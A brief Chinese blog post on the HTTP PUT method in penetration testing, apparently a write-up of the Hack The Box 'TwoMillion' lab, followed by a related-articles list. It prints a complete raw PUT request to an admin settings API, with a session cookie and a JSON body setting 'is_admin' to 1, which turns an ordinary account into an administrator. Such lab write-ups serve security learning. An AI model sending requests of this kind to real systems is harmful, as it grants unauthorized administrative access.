渗透测试与HTTP中的PUT请求

PUT 请求用于向服务器更新指定资源,可以理解为对服务器上的资源进行修改操作。使用 PUT 请求方式会覆盖原有的资源内容,因此需要谨慎使用。

在渗透测试中,有可能服务端会暴露PUT请求的api,如修改用户权限的api,例如HTB的TwoMillion靶场就利用了这个api将普通用户提升为管理员用户:

复制代码
PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=lb54v6es5dm1k3h5fvk8vu325p

Connection: close

Content-Type:application/json

Content-Length: 51



{

	"email":"12345@gmail.com",

"is_admin":1

}
相关推荐
清欢渡---4 分钟前
HCIP-第五章vrrp
网络·网络安全·hcip
chenyulin454514 分钟前
企业微信API:海量会话存档数据的高性能检索与Elasticsearch索引设计
大数据·人工智能·安全·企业微信
Inhand陈工20 分钟前
当发电机装上“智慧大脑”:IG502+白鹰能源管家打造中东发电机远程监控与防盗方案
大数据·网络·物联网·阿里云·能源·边缘计算·信息与通信
CHANG_THE_WORLD1 小时前
TCP 四次挥手彻底解析:FIN、ACK、SEQ、半关闭与 TIME-WAIT
网络·网络协议·tcp/ip
启雀AI10 小时前
生物医疗行业如何建设合规、安全、可复用的知识库?
人工智能·安全·软件构建·知识图谱·知识库
楷哥爱开发10 小时前
如何使用 Claude Fable 5 进行网页抓取?2026最新实战教程
大数据·网络·人工智能
Sirius Wu10 小时前
OpenClaw Skill:Matplotlib 可视化技能 + 沙箱双层隔离完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
测试员周周11 小时前
【skills5】一份 spec 生成 k6/JMeter/Locust:性能压测 + 全站截图,上线前的双保险
功能测试·网络协议·测试工具·jmeter·http·自动化·集成测试
酣大智11 小时前
常用 IP 协议号大全(IP 层承载的上层协议)
网络·网络协议·tcp/ip
冬奇Lab11 小时前
每日一个开源项目(第160篇):Destructive Command Guard - 在 AI Agent 运行 rm -rf 之前拦截它
人工智能·安全·开源